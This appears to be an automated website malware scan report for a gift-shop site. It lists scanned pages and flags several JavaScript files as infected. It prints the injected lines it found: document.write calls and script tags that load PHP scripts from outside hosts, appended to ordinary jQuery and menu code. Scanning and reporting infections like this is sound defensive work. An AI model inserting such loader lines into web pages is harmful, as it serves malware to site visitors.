Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=winterberrygifts.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://winterberrygifts.com/ | 200 OK Content-Length: 9135 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://forsakringsguiderna.se/xnmtlgzf.php?id=36902586"></script> | ||
http://winterberrygifts.com/sg_jscripts/jquery_1.5.2_min.js | 200 OK Content-Length: 86040 Content-Type: application/javascript | clean |
http://winterberrygifts.com/sg_jscripts/jquery.scrollTo-1.4.2-min.js | 200 OK Content-Length: 2369 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:'xy',duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scrollable=function(){return this.map(function(){var a=this,i=!a.nodeName||d.inArray(a.nodeName.toLowerCase(),['iframe','#document','html','body'])!=-1;if(!i)return a;var e=(a.contentWindow||a).document||a.ownerDocument||a;return d.browser.safari||e.compatMode=='BackCompat'?e.body:e.documentElement document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://winterberrygifts.com/sg_jscripts/eventlistener.js | 200 OK Content-Length: 764 Content-Type: application/javascript | clean |
http://winterberrygifts.com/winterberry-0-reader-only-for-ebay_menutree_anim.js | 200 OK Content-Length: 906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function init_menutree_anim() { $ml('.menutree_child .menutreetop li').hover( function(){ var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.css('opacity', 0); ul.css('visibility', 'visible'); ul.animate({ opacity: 1 }, 400); } }, function(){ var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.animate({ opacity: 0 }, 400, 'linear', function(){ $ } }); } function init_menutree_anim_ie7() { $ml('.menutree_child .menutreetop li').hover( function() { var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.css('visibility', 'visible'); } }, function() { var ul = $ml(this).find('ul:first'); if (ul) { ul.stop(); ul.css('visibility', 'hidden'); };});} document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://winterberrygifts.com/register.php | 200 OK Content-Length: 6953 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://forsakringsguiderna.se/xnmtlgzf.php?id=36902764"></script> | ||
http://winterberrygifts.com/sg_jscripts/misc.js | 200 OK Content-Length: 1004 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function addClass(target, classValue) { var pattern = new RegExp("(^| )" classValue "( |$)"); if(!pattern.test(target.className)) { if(target.className == "") { target.className = classValue; } else { target.className = " " classValue; } } } function removeClass(target, classValue) { var removedClass = target.className; var pattern = new RegExp("(^| )" classValue "( { var len = arr.length; for (var i = 0; i < len; i ) { if(arr[i]===v){return true;} } return false; } function sub_array_contains(arr, v) { var len = arr.length; for (var i = 0; i < len; i ) { if(arr[i][0]===v){return true;} } return false; } document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://winterberrygifts.com/sg_jscripts/form.js | 200 OK Content-Length: 380 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function input_focus(obj) { removeClass(obj, 'hinted'); if(obj.value == obj.alt) { obj.value=''; } } function input_blur(obj) { if((obj.value == obj.alt)||(obj.value == '')) { addClass(obj, 'hinted'); obj.value = obj.alt; } } document.write('<script src="http://slawex781.home.pl/pWfzT9gF.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://winterberrygifts.com/index.php | 200 OK Content-Length: 9135 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://forsakringsguiderna.se/xnmtlgzf.php?id=36902586"></script> | ||
http://winterberrygifts.com/contact-us.php | 200 OK Content-Length: 6918 Content-Type: text/html | clean |
http://winterberrygifts.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: winterberrygifts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 15:46:30 GMT
Server: Apache
Content-Length: 9135
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...9135 bytes of data.
GET / HTTP/1.1
Host: winterberrygifts.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 15:46:30 GMT
Server: Apache
Content-Length: 9135
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...9135 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: winterberrygifts.com
Referer: http://www.google.com/search?q=winterberrygifts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: winterberrygifts.com
Referer: http://www.google.com/search?q=winterberrygifts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.